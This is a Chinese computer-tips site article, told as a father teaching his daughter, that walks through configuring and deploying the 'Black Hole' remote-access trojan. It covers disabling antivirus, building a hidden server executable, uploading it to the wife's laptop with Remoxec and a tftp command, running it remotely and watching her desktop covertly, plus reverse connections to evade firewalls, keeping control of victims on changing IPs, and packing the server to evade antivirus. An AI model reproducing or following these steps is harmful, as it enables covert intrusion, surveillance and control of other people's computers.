萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 利用木馬程序實現遠程控制電腦

利用木馬程序實現遠程控制電腦

木馬,是黑客必備的工具;使用木馬,是黑客的基本技能。木馬用得好,威力可不小,這是黑客圈的名言。所以要想成為一名真正的黑客,一定要會玩轉木馬。那麼我們該如何配置並使用木馬呢?請看下文。

自從女兒學會遠程入侵後,她就發現了一個新用途。如果她有什麼話想對她媽媽說,但是又不想當面說的,就會在她媽媽的筆記本電腦桌面上的“秘密文件裡面留言。看到女兒把黑客技術用在正途上,我也非常高興。

星期六下午,我正在思考接下來要教什麼,女兒就沖到我書房,向我求助:“爸爸,你教我一些厲害的黑客技術,我要去跟同學比試!我一聽大吃一驚。經過詳細詢問後,我知道了原委。原來,女兒學會了一些黑客技術後,迫不及待地在同學面前炫耀,自然引起一些電腦用得很好的男同學的不滿,於是就向我女兒發起了挑戰。

“你現在的本事還不夠,不要去比了,學黑客技術不是用來比試的。

“可他們威脅要盜我的QQ號……

“什麼?看來我得教你一些特別的東西……

如何配置與使用木馬

我對女兒說:“他們要盜你的QQ號,十有八九用的是木馬,現在我就教你如何用木馬,保證你的那些同學知道後大吃一驚! 打開電腦,我先關閉殺毒軟件,避免它查殺木馬。然後挑選了最新版的黑洞木馬,再對女兒說:“我用黑洞木馬來給你演示一下,其他的木馬程序的配置和使用都大同小異,憑你這聰明的腦子,應該難不倒你。

我運行木馬目錄中的Client.exe文件,它是黑洞木馬的客戶端文件。第一次運行Client.exe會出現黑洞木馬的配置窗口,在窗口中“監聽端口處,輸入2007(圖1),再切換到“連接密碼標簽,輸入連接肉雞所需的密碼,例如123456。其他選項不用動,保持默認即可,點擊“確定按鈕就設置好了連接密碼。

小知識:木馬一般都有客戶端和服務端,服務端是讓遠程用戶運行的,當用戶運行了服務端後,黑客就可以通過客戶端對他的電腦進行遠程控制了。

接著,我進入軟件的主界面,在主界面中依次點擊“文件→創建自動運行EXE版本服務端安裝程序,彈出“創建安裝程序配置窗口,在“安裝選項中將“安裝過程中顯示提示信息、“安裝完畢後……快捷方式和“安裝完畢後添加……列表三個選項前的鉤取消,這樣做是為了更好地隱藏木馬,否則就等於告訴別人中木馬了。

然後,我又切換到“控制選項標簽,選中“使用自定義控制密碼選項,輸入控制密碼,例如123456,再切換到“連接選項標簽,在“固定連接選項中分別填入本機的IP地址和端口號,這裡我填的是老婆筆記本電腦的IP地址192.168.150.1,端口號是2007(圖2)。設置完成後點擊“生成按鈕,木馬服務端muma.exe就生成了。

“現在我要將木馬服務端上傳到你媽媽的電腦中,知道用什麼上傳嗎?我問女兒,她眨了眨眼道:“當然是用Remoxec.exe和tftpd32.exe這對搭檔,最近我一直在玩它們。“答對了!我贊許道。

我把tftpd32.exe和muma.exe放在同一個文件夾中,運行Remoxec.exe,在“用戶名中填入“new,密碼為空,然後在“命令或程序名中輸入“tftp -i 192.168.150.1 get muma.exe點擊“運行按鈕, muma.exe就上傳到老婆的筆記本電腦中了(圖3)。

現在,等老婆運行muma.exe即可激活木馬。當然啦,老婆暫時不在家中,自然不可能激活,這可難不到我,我直接在“命令或程序名輸入“muma.exe,點擊“運行。在到黑洞木馬的客戶端看看,瞧,有反應了(圖4)。

女兒接手操作後,很快就學會了木馬的配置和遠程種植,還特意通過黑洞客戶端給我看了老婆的電腦桌面。我特意叮囑女兒,與同學較勁時,不要用木馬干壞事,盜號是千萬不要做的,這是違法的,這不符合黑客的精神。

我的經驗

上文中介紹的是最基本的反彈連接設置(就是讓服務端主動連接客戶端,這樣做的好處是可以避開防火牆,更好地進行遠程控制),適合在靜態IP地址的情況下使用。

但如果遠程用戶使用的是ADSL上網,IP地址每次重啟後都會改變,這時就需要使用更高級的反彈連接方式,例如FTP更新、ASP更新等,這些方式都可以有效地解決IP地址變更的問題,即使本機的IP地址改變,肉雞也不會丟,前提是要有一個FTP空間或者ASP空間,有興趣嘗試的朋友可以參考黑洞木馬的幫助文檔。

當我們配置完木馬的服務端程序後,最好能對服務端程序進行加殼等一系列免殺處理,否則服務端很容易被殺毒軟件查殺。

copyright © 萬盛學電腦網 all rights reserved